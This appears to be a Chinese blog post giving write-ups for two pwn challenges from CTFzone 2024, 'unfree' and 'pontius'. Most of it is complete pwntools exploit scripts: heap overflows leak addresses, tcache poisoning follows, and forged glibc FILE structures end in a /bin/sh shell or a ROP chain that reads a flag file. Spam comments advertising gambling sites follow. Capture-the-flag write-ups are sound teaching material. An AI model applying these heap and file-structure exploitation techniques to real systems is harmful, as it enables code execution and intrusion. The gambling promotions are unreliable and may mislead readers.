2024 CTFzone Pwn 部分 Writeup
|
1,381
|
6
|
Writeup

附件见ctftime

unfree

简单的常规堆

from pwn import*
r=remote("unfree.ctfz.zone",17171)
#r=process('./unfree')
context.log_level='debug'

def new(idx,size,content):
	r.recvuntil("Exit\n")
	r.sendline("1")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.sendline(str(size))
	r.recvline()
	r.send(content)

def edit(idx,content):
	r.recvuntil("Exit\n")
	r.sendline("2")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.send(content)

def show(idx):
	r.recvuntil("Exit\n")
	r.sendline("3")
	r.recvline()
	r.sendline(str(idx))

def exit():
	r.recvuntil("Exit\n")
	r.sendline("0")

new(0,0x28,"a"*0x28+p64(0xd41))
new(1,0xbe8,"\n")
new(2,0x28,"\n")
new(3,0x118,"\n")

edit(2,"a"*0x30)
show(2)

r.recvuntil("a"*0x30)
heap1=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))<<12

edit(2,"b"*0x28+p64(0x101))


new(4,0x28,"b"*0x28+p64(0xeb1))
new(5,0xd58,"\n")
new(6,0x28,"\n")
new(7,0x118,"\n")

edit(6,"b"*0x30)
show(6)

r.recvuntil("b"*0x30)
heap2=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))

edit(6,"b"*0x28+p64(0x101))


heap=((heap1+0xef0)^heap2)<<12
success("heap: "+hex(heap))

new(8,0x28,"c"*0x28+p64(0xeb1))
new(9,0xec1,"\n")

edit(8,"c"*0x30)
show(8)

r.recvuntil("c"*0x30)
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x203b20
success("libc_base: "+hex(libc_base))

edit(8,"c"*0x28+p64(0xe91))

edit(6,"b"*0x28+p64(0x101)+p64((libc_base+0x2044c0)^(heap>>12)))

new(10,0xf8,"\n")
new(11,0xf8,p64(heap1+0x2d0))

#0x00000000000a5678 : mov rdi, qword ptr [rax + 8] ; call qword ptr [rax]

fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x10,"\x00")
fake_IO_struct+="/bin/sh"
fake_IO_struct=fake_IO_struct.ljust(0x20,"\x00")
fake_IO_struct+=p64(0)
fake_IO_struct=fake_IO_struct.ljust(0x28,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x88,"\x00")
fake_IO_struct+=p64(heap1+0x2d0)
fake_IO_struct=fake_IO_struct.ljust(0xa0,"\x00")
fake_IO_struct+=p64(heap1+0x3d0)
fake_IO_struct=fake_IO_struct.ljust(0xd8,"\x00")
fake_IO_struct+=p64(libc_base+0x202228)
fake_IO_struct=fake_IO_struct.ljust(0x100,"\x00")
fake_IO_struct+=p64(libc_base+0x582c2)
fake_IO_struct=fake_IO_struct.ljust(0x108,"\x00")
fake_IO_struct+=p64(heap1+0x2e0)
fake_IO_struct=fake_IO_struct.ljust(0x168,"\x00")
fake_IO_struct+=p64(libc_base+0xa5678)
fake_IO_struct=fake_IO_struct.ljust(0x1e0,"\x00")
fake_IO_struct+=p64(heap1+0x3d0)

edit(1,fake_IO_struct)

#gdb.attach(r,"b _IO_wdoallocbuf")

exit()

r.interactive()

pontius

自定义的堆管理器,菜单在unicore-engine的对于int 0x80的hook里面

分配一个0x101的堆在free就可以控制index_chunk了,后续就是任意地址写

from pwn import*
r=remote("pontius.ctfz.zone",41337)
#r=process(["./ld.so","./pontius"],env={"LD_PRELOAD": "/home/kagehutatsu/Downloads/pontius/task/libc.so.6"})
#r=process("./server.sh")
#r=remote("127.0.0.1",9999)
context.log_level='debug'
context.arch="amd64"

def new(size):
	global shellcode
	shellcode+=asm("mov eax, 1")
	shellcode+=asm("mov edi, "+str(size))
	shellcode+=asm("int 0x80")

def edit(idx,content):
	global shellcode, data_address, data
	shellcode+=asm("mov eax, 2")
	shellcode+=asm("mov edi, "+str(idx))
	shellcode+=asm("mov esi, "+str(data_address))
	shellcode+=asm("mov edx, "+str(len(content)))
	shellcode+=asm("int 0x80")
	
	data_address+=len(content)
	data+=content

def delete(idx):
	global shellcode
	shellcode+=asm("mov eax, 3")
	shellcode+=asm("mov edi, "+str(idx))
	shellcode+=asm("int 0x80")

def show(idx):
	global shellcode
	shellcode+=asm("mov eax, 4")
	shellcode+=asm("mov edi, "+str(idx))
	shellcode+=asm("int 0x80")

shellcode=""
data_address=0xCAFEB500
data=""

new(0x101)
new(0x102)
new(0x103)

delete(0)
new(0x100)
show(0)

shellcode+=asm("hlt")
shellcode=shellcode.ljust(0x500,"\x00")
shellcode+=data

r.recvline()
r.send(shellcode)

libm_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))+0x23fd8
success("libm_base: "+hex(libm_base))

libc=ELF("./libc.so.6")

rwx=libm_base-0x8000
libc_base=libm_base+0x109000
setcontext=libc_base+libc.sym["setcontext"]+53
magic_gadget=libc_base+0x1478e2
IO_stdout=libm_base+0x2e05c0
#IO_stdout=libc_base+libc.sym["_IO_2_1_stdout_"]
fake_stack_address=IO_stdout+0x200

pop_rax=libc_base+0x40647
pop_rdi=libc_base+0x28215
pop_rsi=libc_base+0x29b29
pop_rdx=libc_base+0x1085ad

#0x00000000001478e2 : mov rdx, qword ptr [rax + 0x38] ; mov rdi, rax ; call qword ptr [rdx + 0x20]
0x3695c0
shellcode=""
data_address=0xCAFEB500
data=""

fake_stack=""
fake_stack+=p64(pop_rdi)+p64(fake_stack_address+0x100)+p64(pop_rsi)+p64(0)+p64(libc_base+libc.sym["open"])
fake_stack+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(fake_stack_address+0x100)+p64(pop_rdx)+p64(0x80)+p64(libc_base+libc.sym["read"])
fake_stack+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])

fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x38,"\x00")
fake_IO_struct+=p64(IO_stdout+0x100)
fake_IO_struct=fake_IO_struct.ljust(0x68,"\x00")
fake_IO_struct+=p64(magic_gadget)
fake_IO_struct=fake_IO_struct.ljust(0x88,"\x00")
fake_IO_struct+=p64(IO_stdout)
fake_IO_struct=fake_IO_struct.ljust(0xa0,"\x00")
fake_IO_struct+=p64(IO_stdout)
fake_IO_struct=fake_IO_struct.ljust(0xd8,"\x00")
fake_IO_struct+=p64(libm_base+0x367248-0x89000)
fake_IO_struct=fake_IO_struct.ljust(0xe0,"\x00")
fake_IO_struct+=p64(IO_stdout)
fake_IO_struct=fake_IO_struct.ljust(0x120,"\x00")
fake_IO_struct+=p64(setcontext)
fake_IO_struct=fake_IO_struct.ljust(0x1a0,"\x00")
fake_IO_struct+=p64(fake_stack_address)+p64(pop_rdi+1)
fake_IO_struct=fake_IO_struct.ljust(0x200,"\x00")
fake_IO_struct+=fake_stack
fake_IO_struct=fake_IO_struct.ljust(0x300,"\x00")
fake_IO_struct+="/tmp/flag.txt"

edit(0,p64(libm_base+0x3695c0-0x89000)+p64(0x400)+p64(libm_base+0x356028-0x89000)+p64(0x100))
edit(0,fake_IO_struct)
show(0)

shellcode+=asm("hlt")
shellcode=shellcode.ljust(0x500,"\x00")
shellcode+=data

success("setcontext: "+hex(setcontext))

r.recvline()
#pause()
#gdb.attach(r,"b _IO_wdoallocbuf")
r.send(shellcode)

r.interactive()

评论

  1. jililiveclub
    2 周前
    2026-1-05 9:29:56

    Anyone tried JiliLiveClub? Pretty good options, some unique games I haven’t seen elsewhere. Give it a look and let me know what you think! jililiveclub

  4. m88a2
    2 周前
    2026-1-08 8:16:28

    Alright, trying my hand at m88a2. Hope lady luck is on my side! Let’s do this! m88a2

  7. f168n.com
    2 周前
    2026-1-09 21:35:04

    F168n.com sounds interesting. New platform to try my luck on. Lets see if I can get a royal flush! f168n.com

  10. playtime apk
    2 周前
    2026-1-09 21:35:21

    Playtime APK? Cool! Always looking for new games to play on my phone. Downloading it now! playtime apk

  13. uu88slot
    2 周前
    2026-1-09 21:35:38

    UU88slot here I come! Hope the slots are hot tonight. Time to try and hit that jackpot! uu88slot

  16. jili golden empire
    1 周前
    2026-1-12 9:58:26

    Yo, jili golden empire is next level stuff. Playing it all the time! Fun and addicting! See for yourself: jili golden empire

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇